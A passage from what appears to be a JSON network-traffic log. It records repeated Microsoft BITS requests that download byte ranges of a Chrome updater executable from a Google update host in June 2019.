  490.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=105676-182544\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  491.         "port": 80
  492.     },
  493.     {
  494.         "count": 1,
  495.         "body": "",
  496.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  497.         "user-agent": "Microsoft BITS/7.5",
  498.         "method": "GET",
  499.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  500.         "version": "1.1",
  501.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  502.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=182545-235456\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  503.         "port": 80
  504.     },
  505.     {
  506.         "count": 1,
  507.         "body": "",
  508.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  509.         "user-agent": "Microsoft BITS/7.5",
  510.         "method": "GET",
  511.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  512.         "version": "1.1",
  513.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  514.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=235457-387454\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  515.         "port": 80
  516.     },
  517.     {
  518.         "count": 1,
  519.         "body": "",
  520.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  521.         "user-agent": "Microsoft BITS/7.5",
  522.         "method": "GET",
  523.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  524.         "version": "1.1",
  525.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  526.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=387455-619308\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  527.         "port": 80
  528.     },
  529.     {
  530.         "count": 1,
  531.         "body": "",
  532.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  533.         "user-agent": "Microsoft BITS/7.5",
  534.         "method": "GET",
  535.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  536.         "version": "1.1",
  537.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  538.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=619309-843977\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  539.         "port": 80
  540.     },
  541.     {
  542.         "count": 1,
  543.         "body": "",
  544.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  545.         "user-agent": "Microsoft BITS/7.5",
  546.         "method": "GET",
  547.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  548.         "version": "1.1",
  549.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  550.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=843978-1423050\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  551.         "port": 80
  552.     },
  553.     {
  554.         "count": 1,
  555.         "body": "",
  556.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  557.         "user-agent": "Microsoft BITS/7.5",
  558.         "method": "GET",
  559.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  560.         "version": "1.1",
  561.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  562.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=1423051-2174378\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  563.         "port": 80
  564.     },
  565.     {
  566.         "count": 1,
  567.         "body": "",
  568.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  569.         "user-agent": "Microsoft BITS/7.5",
  570.         "method": "GET",
  571.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  572.         "version": "1.1",
  573.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  574.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=2174379-3522791\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  575.         "port": 80
  576.     },
  577.     {
  578.         "count": 1,
  579.         "body": "",
  580.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  581.         "user-agent": "Microsoft BITS/7.5",
  582.         "method": "GET",
  583.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  584.         "version": "1.1",
  585.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  586.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=3522792-5055846\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  587.         "port": 80
  588.     },
  589.     {
  590.         "count": 1,
  591.         "body": "",
  592.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  593.         "user-agent": "Microsoft BITS/7.5",
  594.         "method": "GET",
  595.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  596.         "version": "1.1",
  597.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  598.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=5055847-6102108\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  599.         "port": 80
  600.     },
  601.     {
  602.         "count": 1,
  603.         "body": "",
  604.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  605.         "user-agent": "Microsoft BITS/7.5",
  606.         "method": "GET",
  607.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  608.         "version": "1.1",
  609.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  610.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=6102109-7233475\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  611.         "port": 80
  612.     },
  613.     {
  614.         "count": 1,
  615.         "body": "",
  616.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  617.         "user-agent": "Microsoft BITS/7.5",
  618.         "method": "GET",
  619.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  620.         "version": "1.1",
  621.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  622.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=7233476-9002772\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  623.         "port": 80
  624.     },
  625.     {
  626.         "count": 1,
  627.         "body": "",
  628.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  629.         "user-agent": "Microsoft BITS/7.5",
  630.         "method": "GET",
  631.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  632.         "version": "1.1",
  633.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  634.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=9002773-10438628\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  635.         "port": 80
  636.     },
  637.     {
  638.         "count": 1,
  639.         "body": "",
  640.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  641.         "user-agent": "Microsoft BITS/7.5",
  642.         "method": "GET",
  643.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  644.         "version": "1.1",
  645.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  646.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=10438629-11885988\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  647.         "port": 80
  648.     },
  649.     {
  650.         "count": 1,
  651.         "body": "",
  652.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  653.         "user-agent": "Microsoft BITS/7.5",
  654.         "method": "GET",
  655.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  656.         "version": "1.1",
  657.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  658.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=11885989-12942231\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  659.         "port": 80
  660.     },
  661.     {
  662.         "count": 1,
  663.         "body": "",
  664.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  665.         "user-agent": "Microsoft BITS/7.5",
  666.         "method": "GET",
  667.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  668.         "version": "1.1",
  669.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  670.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=12942232-13981114\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  671.         "port": 80
  672.     },
  673.     {
  674.         "count": 1,
  675.         "body": "",
  676.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  677.         "user-agent": "Microsoft BITS/7.5",
  678.         "method": "GET",
  679.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  680.         "version": "1.1",
  681.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  682.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=13981115-15457991\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  683.         "port": 80
  684.     },
  685.     {
  686.         "count": 1,
  687.         "body": "",
  688.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  689.         "user-agent": "Microsoft BITS/7.5",
  690.         "method": "GET",
  691.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  692.         "version": "1.1",
  693.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  694.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=15457992-16973479\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  695.         "port": 80
  696.     },
  697.     {
  698.         "count": 1,
  699.         "body": "",
  700.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  701.         "user-agent": "Microsoft BITS/7.5",
  702.         "method": "GET",
  703.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  704.         "version": "1.1",
